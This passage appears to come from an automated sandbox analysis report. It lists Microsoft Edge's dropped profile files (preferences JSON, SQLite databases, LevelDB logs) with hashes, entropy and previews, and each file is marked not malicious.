                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (17418), with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):17420
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.487190767954413
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:stiJ99QTryDigabatSuypPs224taFvrE6ZNEkq3NdpBpJKTKNEeIgS8wbV+FAGSv:stiPGKSu4Ps224tCDX8FoeNunbGCQwNp
                                                                                                                                                                                                                                                                                                    MD5:875468E6FEE408ADC5B32359075CE66F
                                                                                                                                                                                                                                                                                                    SHA1:F37626B90E840444D8D0942C90E8AEA8E050F123
                                                                                                                                                                                                                                                                                                    SHA-256:ED688CBAF52AC9048914A65DF8406F337D9C62ED49B37A698456C697342332BA
                                                                                                                                                                                                                                                                                                    SHA-512:A8BA455C2E424C19E1CCAEBE96D90120CACD6DCE7F28867AB981C5BFCF8580E85080883D21E61D04344197B9AF9D35A397168B1274DF8FE4F3FA7ACE5832F3CA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377747732048100","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):9861
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.107414975211011
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:stikdpPs224taFvrE9kuoS8wbV+FAGSQAdUitPbYJ:stiQPs224tCDwbGCQXp
                                                                                                                                                                                                                                                                                                    MD5:C142ACF7F709F2ED8C74E888756518C6
                                                                                                                                                                                                                                                                                                    SHA1:3DF8A1314DC73A2E11F9B67657BABA716308A7D1
                                                                                                                                                                                                                                                                                                    SHA-256:F0882C2886E056B6B574705FCCD34128FA937C4945B4D0CC1F958C0B66540402
                                                                                                                                                                                                                                                                                                    SHA-512:1C24493118C99B119EC76E7AB9B3FD8030D4C4F66579AAF76B5837F445C10142C23EECA6825B295FF8B528A00E76A2BDC01DB0AC9B3FBA15DBB2C2F41D03EDD6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377747732048100","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.10209375703459703
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:Gu0fFiH3F0fFiH3389XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl0:+kakHspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                                                    MD5:74294AE18390A5FB8C0077982F52520B
                                                                                                                                                                                                                                                                                                    SHA1:A15F94F6075E1486428CA156B1D81EEB80C34D40
                                                                                                                                                                                                                                                                                                    SHA-256:E2F122FE6ED3704CB71BB352D51AB621D467F8D27B0B0C1CCC615380884C3ACF
                                                                                                                                                                                                                                                                                                    SHA-512:C36D48A0B42BA2946743AAFC6E25E7B3FA0FBBB463C5D1158AA924EF192B342E17AD9D85EC433635858222186C39FAF9C8E7E186C67209F1E7A737740435789E
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:..-.............M.........=S....$J...V...o&.R.. ..-.............M.........=S....$J...V...o&.R.. ........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):317272
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8892766752947833
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:384:W73nftiWe79eGOem2JezreKDel7eSjQ1Ee2v82y4ySJyIyGpybpxyQA:WHpQ
                                                                                                                                                                                                                                                                                                    MD5:6358592404AF8F04D06085983A6FCC58
                                                                                                                                                                                                                                                                                                    SHA1:775479056655D092B1F2D17349DBCEF0A908CBE7
                                                                                                                                                                                                                                                                                                    SHA-256:71478A8E8BC4B2E9079A8B2933D9BAF52E251549F6AE14B1110D12252117CECC
                                                                                                                                                                                                                                                                                                    SHA-512:CF9E159ECED6808C7EBBBACAF7F0157E6657846DBD989E6B27486EEEE84BCF3FE56A5E969D47EB45A36E02686E037A569795EE3FD43CFC579F7C79A04CED945A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):693
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5695918630254706
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuu8llt1f8d:pHayFlLA
                                                                                                                                                                                                                                                                                                    MD5:1A4F664BD0117A8C6915CFC89819A531
                                                                                                                                                                                                                                                                                                    SHA1:2DF13747EDFDEB864809219B4756EB833516920E
                                                                                                                                                                                                                                                                                                    SHA-256:708E061A853A02141312358410D46586A95C22BA9AA01C5CB8000ACA92D7DF19
                                                                                                                                                                                                                                                                                                    SHA-512:B59D171545F5B38A2C8B5161BC8E8AF2C699EC185B4F4EEFB4636E5D1AAA28BD31BFCAF4269E8C4A7A64D8B5F32816B854F03437C50EBACCCBBED60CE64D4CE4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............H$.U:...............#38_h.......6.Z..W.F.....`;......`;..........V.e................V.e................V.e................k..O0................39_config..........6.....n ....1
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1280295897412795
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXkc+6q2PN723oH+TcwtfrK+IFUt8vXkcdZmw+vXkcvkwON723oH+TcwtfrUeLJ:01vVaYeb23FUt8Pj/+P55OaYeb3J
                                                                                                                                                                                                                                                                                                    MD5:EC53BECC60FB5A52D127B988BF58898B
                                                                                                                                                                                                                                                                                                    SHA1:42EA7CD0E0485DE9EB770487AEDE33EF50C902D4
                                                                                                                                                                                                                                                                                                    SHA-256:A1420DF643B94B2C5356EF091F79BFC9685A392118D5A48DB98D2B059FFD2512
                                                                                                                                                                                                                                                                                                    SHA-512:17FC658B63BECC329CD89EAA47481585418F0637A68EE179100CE932BC2ED36E4B574D3C61FE491344979E53E38D5E9249765979D2A2F21C1A9AF4ADA770A24A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.098 1b40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/03-20:02:12.099 1b40 Recovering log #3.2024/12/03-20:02:12.099 1b40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1280295897412795
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXkc+6q2PN723oH+TcwtfrK+IFUt8vXkcdZmw+vXkcvkwON723oH+TcwtfrUeLJ:01vVaYeb23FUt8Pj/+P55OaYeb3J
                                                                                                                                                                                                                                                                                                    MD5:EC53BECC60FB5A52D127B988BF58898B
                                                                                                                                                                                                                                                                                                    SHA1:42EA7CD0E0485DE9EB770487AEDE33EF50C902D4
                                                                                                                                                                                                                                                                                                    SHA-256:A1420DF643B94B2C5356EF091F79BFC9685A392118D5A48DB98D2B059FFD2512
                                                                                                                                                                                                                                                                                                    SHA-512:17FC658B63BECC329CD89EAA47481585418F0637A68EE179100CE932BC2ED36E4B574D3C61FE491344979E53E38D5E9249765979D2A2F21C1A9AF4ADA770A24A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.098 1b40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/03-20:02:12.099 1b40 Recovering log #3.2024/12/03-20:02:12.099 1b40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):816
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                    MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                    SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                    SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                    SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):346
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.135279770414678
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXkcXAq2PN723oH+TcwtfrzAdIFUt8vXkcAXZmw+vXkcAFkwON723oH+TcwtfrzS:0tAvVaYeb9FUt8PW/+Pq5OaYeb2J
                                                                                                                                                                                                                                                                                                    MD5:5167A80C0C30DE106EDF134C1364E21B
                                                                                                                                                                                                                                                                                                    SHA1:31CD033B8616662B0C466C911BD9D7E52D25EB93
                                                                                                                                                                                                                                                                                                    SHA-256:ACBFF1BF2C589BEF0433CE6492D9F82CDFF3C5D29FF3479B8CA81C663705E64E
                                                                                                                                                                                                                                                                                                    SHA-512:7D82244E1188A03ED5D9AF938359BF7EDA6CD26BF703C6CB74A109C72615441FF36024C0101967A806EC400BE34A6DF0CD449B43CA6BAA890EF12D17814981A5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.095 1b40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/03-20:02:12.096 1b40 Recovering log #3.2024/12/03-20:02:12.096 1b40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):346
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.135279770414678
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXkcXAq2PN723oH+TcwtfrzAdIFUt8vXkcAXZmw+vXkcAFkwON723oH+TcwtfrzS:0tAvVaYeb9FUt8PW/+Pq5OaYeb2J
                                                                                                                                                                                                                                                                                                    MD5:5167A80C0C30DE106EDF134C1364E21B
                                                                                                                                                                                                                                                                                                    SHA1:31CD033B8616662B0C466C911BD9D7E52D25EB93
                                                                                                                                                                                                                                                                                                    SHA-256:ACBFF1BF2C589BEF0433CE6492D9F82CDFF3C5D29FF3479B8CA81C663705E64E
                                                                                                                                                                                                                                                                                                    SHA-512:7D82244E1188A03ED5D9AF938359BF7EDA6CD26BF703C6CB74A109C72615441FF36024C0101967A806EC400BE34A6DF0CD449B43CA6BAA890EF12D17814981A5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.095 1b40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/03-20:02:12.096 1b40 Recovering log #3.2024/12/03-20:02:12.096 1b40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                    MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                    SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                    SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                    SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:117.0.2045.55
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44455
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.089779405179669
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtPMJkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNOkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:5915190E94C5F0C68D2F6101F4510098
                                                                                                                                                                                                                                                                                                    SHA1:EA5484700EC7DB3882F6B326DB405EE49DC5AD96
                                                                                                                                                                                                                                                                                                    SHA-256:E1241004A7AF4EC5CBFE3E8CBAC6CFBDA28A556753E099A96C9CA05371744B81
                                                                                                                                                                                                                                                                                                    SHA-512:E76AEEA6159668E4EFF5E7298E423A9366A8661C2650616D5D2EABF56A02BF1E42DA36D217C8D0440E0BBDE1178184A69061512A647B4AC0FA30DFBFBEE3C78D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44455
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.089779405179669
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtPMJkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNOkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:5915190E94C5F0C68D2F6101F4510098
                                                                                                                                                                                                                                                                                                    SHA1:EA5484700EC7DB3882F6B326DB405EE49DC5AD96
                                                                                                                                                                                                                                                                                                    SHA-256:E1241004A7AF4EC5CBFE3E8CBAC6CFBDA28A556753E099A96C9CA05371744B81
                                                                                                                                                                                                                                                                                                    SHA-512:E76AEEA6159668E4EFF5E7298E423A9366A8661C2650616D5D2EABF56A02BF1E42DA36D217C8D0440E0BBDE1178184A69061512A647B4AC0FA30DFBFBEE3C78D
                                                                                                                                                                                                                                                                                                    Malicious:false
